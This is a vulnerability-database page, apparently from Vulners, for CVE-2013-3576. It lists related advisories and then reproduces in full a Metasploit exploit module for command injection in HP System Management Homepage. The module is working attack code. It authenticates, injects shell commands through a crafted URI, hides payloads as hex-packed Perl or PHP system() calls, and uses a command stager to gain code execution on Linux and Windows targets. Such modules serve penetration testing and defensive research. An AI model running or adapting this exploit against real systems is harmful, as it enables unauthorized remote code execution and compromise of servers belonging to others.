| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| HP System Management Homepage JustGetSNMPQueue Command Injection | 22 Jun 201300:00 | – | zdt | |
| CVE-2013-3576 | 14 Jun 201300:00 | – | attackerkb | |
| CVE-2013-3576 | 24 Jun 201300:00 | – | circl | |
| HP System Management Home Page Command Injection (CVE-2013-3576) | 6 Jun 201300:00 | – | checkpoint_advisories | |
| CVE-2013-3576 | 14 Jun 201318:00 | – | cve | |
| CVE-2013-3576 | 14 Jun 201318:00 | – | cvelist | |
| DSquare Exploit Pack: D2SEC_HPSMH | 14 Jun 201318:55 | – | d2 | |
| HP System Management Homepage RCE | 10 Jul 201300:00 | – | dsquare | |
| HP System Management Homepage - JustGetSNMPQueue Command Injection (Metasploit) | 24 Jun 201300:00 | – | exploitdb | |
| HP System Management Homepage ginkgosnmp.inc Command Injection | 25 Sep 201300:00 | – | nessus |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "HP System Management Homepage JustGetSNMPQueue Command Injection",
'Description' => %q{
This module exploits a vulnerability found in HP System Management Homepage. By
supplying a specially crafted HTTP request, it is possible to control the
'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),
which will be used in a exec() function.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Markus Wulftange', # Discovery & multi-platform Metasploit module
'sinn3r' # initial Windows Metasploit module
],
'References' =>
[
['CVE', '2013-3576'],
['OSVDB', '94191'],
['US-CERT-VU', '735364']
],
'DefaultOptions' =>
{
'SSL' => true
},
'Platform' => %w{ linux win },
'Targets' =>
[
['Linux', {
'Platform' => 'linux',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => 'bourne'
}],
['Linux (x64)', {
'Platform' => 'linux',
'Arch' => ARCH_X64,
'CmdStagerFlavor' => 'bourne'
}],
['Windows', {
'Platform' => 'win',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => 'vbs'
}],
['Windows (x64)', {
'Platform' => 'win',
'Arch' => ARCH_X64,
'CmdStagerFlavor' => 'vbs'
}],
],
'Privileged' => false,
'DisclosureDate' => '2013-06-11'
))
register_options(
[
Opt::RPORT(2381),
# USERNAME/PASS may not be necessary, because the anonymous access is possible
OptString.new("USERNAME", [false, 'The username to authenticate as']),
OptString.new("PASSWORD", [false, 'The password to authenticate with'])
])
end
def post_auth?
true
end
def check
@cookie = ''
sig = Rex::Text.rand_text_alpha(10)
cmd = "echo #{sig}&&whoami&&echo #{sig}"
res = send_command(cmd)
if not res
vprint_error("Connection timed out")
return Exploit::CheckCode::Unknown
end
if res.code == 200 && res.body =~ /#{sig}/
vprint_good("Running with user '#{res.body.split(sig)[1].strip}'")
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def login
username = datastore['USERNAME']
password = datastore['PASSWORD']
cookie = ''
res = send_request_cgi({
'method' => 'POST',
'uri' => '/proxy/ssllogin',
'vars_post' => {
'redirecturl' => '',
'redirectquerystring' => '',
'user' => username,
'password' => password
}
})
if not res
fail_with(Failure::Unknown, "#{peer} - Connection timed out during login")
end
# CpqElm-Login: success
if res.headers['CpqElm-Login'].to_s =~ /success/
cookie = res.get_cookies.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
end
cookie
end
def setup_stager
execute_cmdstager(:temp => './', :linemax => 2800)
end
def execute_command(cmd, opts={})
# Encodes command as sequence of hex values to be passed to the Perl/PHP
# function `pack("N*", ...)` that is then used in a `system(...)` call.
# trailing bytes need to be handled separately
rem = cmd.size % 4
if rem != 0
last_bytes = ".chr(#{cmd[-rem..-1].each_byte.map(&:ord).join(").chr(")})"
cmd = cmd[0...-rem]
end
# convert double words into hex representation
dwords = cmd.each_byte.each_slice(4).map { |dw|
sprintf("0x%x", dw.pack("C*").unpack("N")[0])
}
# build final Perl/PHP code that is getting executed
script_code = "system(pack(chr(78).chr(42),#{dwords.join(",")})#{last_bytes});"
# build Perl/PHP invocation command
case target.opts['Platform']
# Perl for Linux as it's more likely to be in the PATH
when "linux" then cmd = "perl -e '#{script_code}'"
# PHP for Windows
when "win" then cmd = "php -r #{script_code}"
end
res = send_command(cmd)
if res && res.code != 200
vprint_error("Unexpected response:\n#{res}")
fail_with(Failure::Unknown, "There was an unexpected response")
end
end
def send_command(cmd)
if !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty? && @cookie.empty?
@cookie = login
if @cookie.empty?
fail_with(Failure::NoAccess, "#{peer} - Login failed")
else
print_good("Logged in as '#{datastore['USERNAME']}'")
end
end
req_opts = {}
req_opts['uri'] = generate_uri(cmd)
unless @cookie.empty?
browser_chk = 'HPSMH-browser-check=done for this session'
curl_loc = "curlocation-#{datastore['USERNAME']}="
req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
end
send_request_raw(req_opts)
end
def generate_uri(cmd)
"#{normalize_uri("smhutil","snmpchp/")}&#{cmd.gsub(/ /, "%20")}&&echo"
end
def exploit
@cookie = ''
setup_stager
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation